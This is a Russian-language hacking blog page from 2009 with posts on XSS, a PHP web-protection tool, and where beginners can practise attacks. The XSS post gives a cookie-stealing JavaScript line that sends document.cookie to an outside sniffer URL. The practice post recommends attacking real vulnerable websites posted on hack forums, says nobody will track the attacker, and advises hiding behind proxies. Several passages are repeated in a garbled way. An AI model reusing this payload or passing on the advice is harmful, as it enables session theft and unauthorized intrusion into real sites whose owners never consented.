где http://www.softtime.ru - адрес, куда происходит переадресация.
А вот и пример кражи кукисов:
где http://www.cgisecurity.com/cgi-bin/cookie.cgi? - адрес сниффера, в котором сохранятся куки.
суббота, 8 августа 2009 г.
XSS
В предыдущем посту я упомянул о таких атаках как xss, sql_injection. Настало время вас познакомить с ними поближе и начну я, пожалуй, с xss. Я считаю что необязательно вам забивать голову как это расшифровывается и как переводится. Возможность проведения атаки заключается в том, что в каком-либо месте скрипта или веб-страницы (комментарии в гостевых книгах, сообщения на форумах) не фильтруется тег script , что может привести к выполнению произвольного кода, написанного на Java Script. Обычно с помощью xss крадут куки или ставят переадресацию на другой ресурс (например с целью получения дополнительного трафика). Пример переадресации:
window. location. href = "http://www.softtime.ru"
где http://www.softtime.ru - адрес, куда происходит переадресация.
А вот и пример кражи кукисов:
document. location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie
где http://www.cgisecurity.com/cgi-bin/cookie.cgi? - адрес сниффера, в котором сохранятся куки.
где http://www.softtime.ru - адрес, куда происходит переадресация.
А вот и пример кражи кукисов:
где http://www.cgisecurity.com/cgi-bin/cookie.cgi? - адрес сниффера, в котором сохранятся куки.
среда, 5 августа 2009 г.
WEB SECURITY SYSTEM
программа предназначена для защиты от SQL-инъекций, xss и RFI-атак. Среди плюсов программый: быстрая работа с php файлами;логирование всех атак в БД;быстрое обнаружение уязвимостей и их устранение. Админка системы позволяет: просматривать IP-адреса атакующих; получать информацию о типах атак; просматривать все логи по конкретному IP атакующего.
Кроме конфигурации, которая располагается в файле config.php, рекомендую изучить содержимое скрипта prt_system.php, т.к в нём сосредоточены основные настройки и функции системы.
Так что смело заливай софтину на свой сервер и приступай к конфигурации. Почувствуй себя админом и Помни, безопасности много не бывает.
Кроме конфигурации, которая располагается в файле config.php, рекомендую изучить содержимое скрипта prt_system.php, т.к в нём сосредоточены основные настройки и функции системы.
Так что смело заливай софтину на свой сервер и приступай к конфигурации. Почувствуй себя админом и Помни, безопасности много не бывает.
воскресенье, 2 августа 2009 г.
Практика
Как вы наверно уже поняли основной проблемой начинающих IT'шников является отсутствие практики, т.к практиковаться на чужих сайтах довольно опасно (это противоречит УК РФ). Сегодня я вам расскажу где же можно попрактиковаться, не нарушая Уголовный Кодекс.
1) Это квесты. Их специально создают, чтобы ломать. На этих квестах очень удобно оттачивать то, что вы прочитали 5 минут назд в какой-нибудь статье. Найти такие квесты можно сдесь.
2) Это слоны, которые размещают на хак-форумах. На каждом таком форуме есть темы, в которые постят ссылки на уязвимые сайты.Несмотря на то, что это реальные сайты, я считаю их тренировочной площадкой, т.к. всё равно за взлом этих сайтов никто тебя искать не будет, потому что в логах останется не только твой IP, но сотни других, желающих попробовать свои силы. Навсякий случай используй проксики.
3) И наконец самое разумный способ-поставить сервер на своём компе! Прикрутить php, поставить mySQL и ставить уязвимые CMS, а потом пытаться их взломать или исправить ошибки в них.
1) Это квесты. Их специально создают, чтобы ломать. На этих квестах очень удобно оттачивать то, что вы прочитали 5 минут назд в какой-нибудь статье. Найти такие квесты можно сдесь.
2) Это слоны, которые размещают на хак-форумах. На каждом таком форуме есть темы, в которые постят ссылки на уязвимые сайты.Несмотря на то, что это реальные сайты, я считаю их тренировочной площадкой, т.к. всё равно за взлом этих сайтов никто тебя искать не будет, потому что в логах останется не только твой IP, но сотни других, желающих попробовать свои силы. Навсякий случай используй проксики.
3) И наконец самое разумный способ-поставить сервер на своём компе! Прикрутить php, поставить mySQL и ставить уязвимые CMS, а потом пытаться их взломать или исправить ошибки в них.
Подписаться на:
Сообщения
